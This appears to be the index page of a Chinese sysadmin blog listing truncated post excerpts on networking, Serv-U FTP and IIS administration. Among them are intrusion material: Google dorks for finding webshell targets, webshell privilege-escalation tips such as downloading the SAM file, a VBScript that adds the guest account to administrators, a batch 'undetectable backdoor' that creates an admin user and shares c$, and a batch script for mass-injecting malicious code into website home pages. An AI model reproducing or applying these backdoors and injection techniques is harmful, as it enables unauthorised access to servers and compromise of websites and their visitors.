柳永法－网络相关

MSN for win2003 非要升级，本人分析出解决方案2009-8-26

Wed, 26 Aug 2009 11:23:55 GMT

今天来公司后，发现登录MSN时提示：“现在有新的版本可用。要继续使用程序，您必须安装新版本。要立即安装吗？”选“是”后，下载半天，最后来个系统版本不对，选否直接就不登录了，相当于不能登录了，郁闷的我呀，想想也是现在的版本是8.5,于是从网上找到了
MSN for 2003的版本，安装时一切顺利，本以..

《网管员面试宝典》节选

Tue, 16 Sep 2008 17:20:47 GMT

第1章正确认识网络管理职业
　　网络管理员几年前就被国家确定为一门新型的IT职业，确立了网络管理员在各行各业中的地位。这是计算机网络普及的必然结果。然而，一方面由于它是一门较新型的职业，另一方面，许多行业的员工和老总，甚至一些刚加入这一行业的初级网络管理员自己对这一新型职业缺乏正确的认识，造成了许多人还..

一家公司的新型防火墙技术

Sat, 29 Mar 2008 17:57:51 GMT

　　常见防火墙的类型主要有三种：包过滤、电路层网关、应用层网关，每种都有各自的优缺点。
　　包过滤是第一代防火墙技术，它按照安全规则，检查所有进来的数据包，而这些安全规则大都是基于低层协议的，如 IP 、 TCP 。如果一个数据包满足以上所有规则，过滤路由器把数据向上层提交，或转发此数据包，否则就丢弃此包。..

什么是二级域名,二级域名有哪几种情况及对搜索引擎的影响

Fri, 21 Mar 2008 10:01:23 GMT

很多人对二级域名的各种情况并不是很了解,像我这样既管理服务器,又做网站,又做搜索引擎优化的人对这个可是了解的要比较多了.现在给大家讲一下:二级域名,显性转发二级域名,隐性转发二级域名,rewrite写正则规则重定向二级域名.
二级域名的出现是为了用短的域名代替长的地址.而且这样做理论上是免费的,所以很多人都喜欢二级..

一个不起眼的小动作，很可能改写中小企业信息产业市场乃至中国整个互联网格局。

Wed, 19 Mar 2008 15:29:37 GMT

　　一个不起眼的小动作，很可能改写中小企业信息产业市场乃至中国整个互联网格局。
　　3月13日，阿里巴巴突然出现在ICANN（全球互联网名称与数字地址分配机构）授权注册商列表中。这意味着，阿里巴巴目前已是通过授权的国际域名服务商，可以给企业和个人提供国际域名注册服务。业内人士在接受采访时表示，这和阿里巴巴..

[已解决]2M 的ADSL为什么能跑到10M呢?

Wed, 19 Mar 2008 14:29:13 GMT

呵呵,2M的ADSL当然不能跑到10M了,如果您是想看看如何才能跑到10M的基本上就不用往下看了.
昨天有主机托管客户跟我理论了半天,大概内容就是:他的机器放在100M共享里他的机器跑到了20M,在任务管理器里是:20% 线路:100M
太大了,没办法只能通知他得限限了,后来他说怎么会呢,这20%就是20M吗,我的机器都跑10M呢,我的才是2M的A..

快速处理交换机故障

Mon, 17 Mar 2008 11:12:51 GMT

　　快速处理交换机故障
　　网管员在工作中经常和交换机打交道，由于交换机在企业网络中应用范围非常广泛，从低端到高端，几乎涉及到每个级别的产品，所以交换机发生故障的几率比路由器、硬件防火墙等高很多。那么如何迅速、准确地查出故障并排除故障呢？交换机故障一般可以分为硬件故障和软件故障两大类，下面给出两类..

Ping总是丢包的原因,故障排除思路,解决方法

Mon, 17 Mar 2008 11:09:58 GMT

总结:一般排除故障的方法是:

带宽有没有占满
换个交换机端口试试
换个网线试试
网卡及主板驱动是不是没装(一般不会是这个问题)
交换机上设置是100M的还是10M的,与机器设置成一样的
还不成换交换机

浅析网络犯罪如何取证　用数据说话

Thu, 27 Dec 2007 10:08:49 GMT

　　随着网络信息技术的发展，计算机网络逐渐成为人们生活和工作中不可或缺的组成部分，它改变了人们传统的工作习惯和生活节奏。在人们越来越依赖网络的今天，伴随着计算机网络的日新月异，计算机网络犯罪也逐渐走进了我们的视线。黑客攻击、网络钓鱼，僵尸网络，这些以谋取非法利益为目的的新兴犯罪手段，使人们诚惶诚恐。..

45种方法拿Webshell的方法

Fri, 07 Dec 2007 16:53:33 GMT

1.
到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!

2.到Google ,site:cq.cn inurl:asp

WEB服务器中网站木马后怎么找这些

Thu, 06 Dec 2007 18:20:55 GMT

VBScript.Encode

shell

xp_cmdshell

LocalAdministrator

提权

2006年100款最佳安全工具谱

Mon, 03 Dec 2007 15:45:59 GMT

　　在2000和2003年非常成功的推出了安全工具调查后，Insecure.Org 非常高兴为大家带来2006年度的安全工具调查。我-Fyodor对nmap-hackers 邮件列表中的用户进行了调查，让大家来分享他们最喜欢用的工具，结果有3243名用户提供了反馈信息。我从反馈信息中选取了大家最喜欢的前100种工具，并将它们进行了分类。建议安全界人士..

从后台得到webshell十大经典技巧大汇总

Sat, 24 Nov 2007 16:16:19 GMT

一、直接上传获得webshell
二、添加修改上传类型
三、利用后台管理功能写入webshell
四、利用后台管理向配置文件写webshell
五、利用后台数据库备份及恢复获得webshell
六、利用数据库压缩功能
七、asp+mssql系统
八、php+mysql系统
九、phpwind论坛从后台到webshell的三种方式
十、也可以利用网站访问计数系统记录来获得webshell

号称“最全的WEBSHELL提权大大全”

Sat, 24 Nov 2007 15:58:23 GMT

WEBSHELL权限提升技巧
c: d: e:.....
C:\Documents and Settings\All Users\「开始」菜单\程序\
     看这里能不能跳转，我们从这里可以获取好多有用的信息比如Serv-U的路径，
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
     看能否跳转到这个目录，如果行那就最好了，直接下它的CIF文件，破解得到pcAnywhere密码，登陆
c:\Program Files\serv-u\
C:\WINNT\system32\config\
     下它的SAM，破解密码
c:\winnt\system32\inetsrv\data\
     是erveryone 完全控制，很多时候没作限制，把提升权限的工具上传上去，然后执行
c:\prel
C:\Program Files\Java Web Start\
c:\Documents and Settings\
C:\Documents and Settings\All Users\
c:\winnt\system32\inetsrv\data\
c:\Program Files\
c:\Program Files\serv-u\
C:\Program Files\Microsoft SQL Server\
c:\Temp\
c:\mysql\(如果服务器支持PHP）
c:\PHP(如果服务器支持PHP）

Windows Route 路由表命令

Tue, 07 Aug 2007 10:52:15 GMT

Windows Route 路由表命令

在本地 IP 路由表中显示和修改条目。

语法

route [-f] [-p] [Command [Destination] [mask Netmask] [Gateway] [metric Metric]] [if Interface]]

参数

-f

清除所有不是主路由（网掩码为 255.255.255.255 的路由）、环回网络路由（目标为 127.0.0.0，网掩码为 255.255.2..

怎么远程控制公司里自己的电脑(不固定IP)

Tue, 24 Jul 2007 19:30:56 GMT

技术实现方法：

公司IP会变呀变（A），

所以咱们（B）在外网中是联系不到他的，

想跟他联系的最好的方法就是，在外网设定一个都知道的固定地点（C），

然后公司内网（A）时不时的与固定外网（C）联系，在C上写上他的地址，说我是A我现在的IP是XXX，

然后咱们（B）想控制公司（A）时可以上固定点（..

诺顿杀毒(Symantec AntiVirus)把alexa当病毒的解决方法

Sun, 22 Jul 2007 23:35:38 GMT

经常不访问自己的柳永法(yongfa365)'Blog

没想到还没下载完就被诺顿杀毒(Symantec AntiVirus)给杀了，在网上找了下，原来是这个原因：原来诺顿杀毒(Symantec AntiVirus)已经把这个软件默认列为隔离了。

其实解决方法很简单:

在配置－－》文件系统自动防护>操作－－》跟踪软件－－》特例－－》将tra..

Serv-U FTP 服务器的管理,添加,复制用户,添加群,设置权限

Wed, 18 Jul 2007 15:28:48 GMT

　比起IIS

　１．账户管理

　　Serv-U对账户的管理相当方便，不仅可以对单个账户进行管理，还可以将具有相同权限的多个账户设置成组，进行统一管理。

　　１）添加／删除单个账户

　　在左边窗口中找到“用户”，右击，选“新建用户”，依次设置“用户名称”、“..

柳永法:Serv-U FTP 服务器，能不能设置多个目录？

Wed, 18 Jul 2007 14:51:39 GMT

综合问题:我想用Serv-U发布计算机里的多个目录,但Serv-U里只能发布一个目录,我别的目录能不能也跟着一起发布在一个用户下边?

问题1.我要发布"E:\"与"D:\www.yongfa365.com\"下的文件,我现在已经建立了一个用户,指到E盘了,我想让这个用户也可以看到"D:\www.yongfa365.com\"里的文件,怎么..

柳永法:Serv-U FTP 比较有用的设置技巧及常见问题

Wed, 18 Jul 2007 11:38:04 GMT

打开Serv-U FTP--> 本地服务器-->域-->您的域-->设置-->记录-->在这里可以设置日志文件名称:推荐格式为:"D:\ftplog\ftp%X%N%D.log"选中下边的"启用记录到文件"和每天自动新建文件.

以上名字这么设置是为了以后清除日志文件而设计.相关文档可以看日志清除

柳永法:Serv-U FTP 设置支持被动(PASV)模式连接

Tue, 17 Jul 2007 08:06:37 GMT

设置支持被动(PASV)模式连接:

本地服务器－－》设置－－》高级－－》PASV 端口范围－－》写上范围，听说得写上4000以后的，可以写上5000－5005－－》FTP设置完毕

进入本地连接属性－－》TCP/IP属性－－》高级－－》选项－－》TCP/IP筛选－－》属性－－》如果启动 TCP/IP 筛选(所有适配器) 是选中的（不是的话直接..

柳永法:Serv-U FTP Message 变量的使用

Tue, 17 Jul 2007 07:57:55 GMT

Serv-U 支持变量显示信息,一般用在用户登录时给用户一些提示之类的.

举例:

新建一个文本文件Serv-U_yongfa365.com.txt

内容为:

    来自 %IP 的会员,您好!
    柳永法(yongfa365)'Blog

    在过去 24 小时里总共有 %U24h 次连接。
    目前有 %UNow 位用户在线，本Serv-U FTP 服务器最多容许 %MaxA..

柳永法:Serv-U FTP 如何设置匿名登录帐户,匿名用户

Tue, 17 Jul 2007 07:36:25 GMT

首先：Serv-U设置匿名登录帐户的操作是非常简单的

其次：匿名

最后：在Serv-U的现有域里新建一个帐户名为Anonymous

Windows Server 2003 服务器下建立隐藏帐号(不死帐号)

Sun, 15 Jul 2007 00:24:36 GMT

不死帐号方法一。

dim wsh

set wsh=createobject("wscript.shell")

wsh.run "net user guest /active:yes",0 （激活guest账号）

wsh.run "net user guest djhacker",0 （修改guest密码为djhacker）

wsh.run "net localgroup administrators guest /add",0 (添..

IIS日志清理,Serv-U日志清理-WSH实例

Thu, 14 Jun 2007 23:14:58 GMT

'作者：柳永法(yongfa365)'Blog

'首发:007-6-14

'首发地址:http://www.yongfa365.com/item/IIS-Log-And-Serv-U-Log-Clear-yongfa365.html

'最后修改:2007-7-18

now-60

&nbs..

[使命]之ISA学习笔记

Thu, 05 Apr 2007 17:42:00 GMT

首先：在你学它之前要完全的信任它！！！

如果出问题了，你可以用net stop /y fweng来停止它，如果还是有问题那就是别的问题了

net stop /y fweng　是就象ISA没有安装过一样

如果只是在界面内停止服务 shenxu说的对

batch1.bat

net stop /y fweng

all service is stopped like ISA has not installed..

各邮箱服务商在SMTP上的设置对发垃圾邮件的人的影响

Sat, 03 May 2008 00:56:33 GMT

　　今天有空完善一下自己的blog,在处理到用户留言后，后台异步给我发封邮件时，总是有问题，找到以前写的JMail发送邮件函数sendmail,还是不成功，真郁闷，这个以前测试成功的呀，于是把以有的参数都加上，OK，成功。
　　而我新申请的xxx@126.com及xxx.xx@163.com都不能发邮件，总提示“The message was undelive..

服了,又有人在找我的数据库地址了

Mon, 07 May 2007 04:42:58 GMT

也不知道是不是我的文章很有价值,还是看我的东西不顺眼,非要找到我的数据库不可,如果你真的想要的话联系我.我给你

启有此礼，竟然敢找我的数据库地址

Sun, 06 May 2007 10:24:57 GMT

今天早上有人一址找我的数据库地址应该是用软件测试地址的，时间都一样,不过希望是专门找的而不是随机找到我的，呵呵，我网站是静态的

ip.cn小偷程序(请勿转载)。

Tue, 27 Mar 2007 17:43:00 GMT

<
form

><
input

name
=
ip

/
><
input

type
=
submit

value
=
"查询IP"
><
/form
>

<%

'来源：http://www.yongfa365.com

IP
=
request
(
"ip"
)

If
IP
=

""

Then
IP
=
request
.
serverv..

五类危险密码不可设

Sat, 18 Nov 2006 19:42:00 GMT

通常不很安全的密码主要有以下几种:
　　第一类:使用用户名/帐号作为密码。

　　虽然这种密码很方便记忆，可是其安全几乎为0。因为几乎所有以破解密码为手段的黑客软件，都首先会将用户名作为破解密码的突破口，而破解这种密码的速度极快，这就等于为黑客的入侵提供了敞开着的大门。

　　第二类:使用用户名/帐号..

永不被杀的后门-批处理的精华

Mon, 28 Aug 2006 18:15:00 GMT

代码思路是影子鹰DESERT朋友的，原代码比较麻烦，我做了改进，这个后门优点就是小而且不会被杀，放到SYSTEM32目录下就可以了，代码如下：
  @echo off
  @attrib +s + r xyt.bat
  @net user xyt hacker /add
  @net localgroup administrators xyt /add
  @net share c$=c:
  @..

防止SQL数据库注入攻击

Sat, 19 Aug 2006 10:01:00 GMT

　风靡全球的SQL注入攻击，相信给很多人留下了深刻的印象，但是在这场攻击过后，笔者查阅了网上目前修补SQL注入的方法，发现里面都是一些“杂乱无章”的修补代码，对于不会编程

　　小知识:SQL注入是从正常的WWW端口访问，而且表面看起来跟一般的Web页面访问没什么区别，所以目前市面的防火墙都不会对SQL注入..

提权21招

Sat, 19 Aug 2006 09:58:00 GMT

[ 2006-7-29 5:04:00 | By: HacKerTv
]

1.radmin连接法

条件是你权限够大，对方连_blank">防火墙也没有。封装个radmin上去，运行，开对方端口，然后radmin上去。本人从来米成功过。，端口到是给对方打开了。

2.paanywhere

C:\\Documents and Settings\\All Users\\Application Data\\Syman..

用批处理对网站首页批量写入挂马代码

Sat, 19 Aug 2006 09:43:00 GMT

用批处理对网站首页批量写入挂马代码

以前在网上发现了一个批量对网站首页加入挂马代马的软件,就有想法用批处理实现此功能
今天学了点批处理,刚好就想出来了,不是很完善,还是那句话...以后在改
利用forfiles这个命令可以简单实现
例如:
forfiles /p d:\ /m index.asp /s /c "cmd.exe /c if @isdir==FALSE..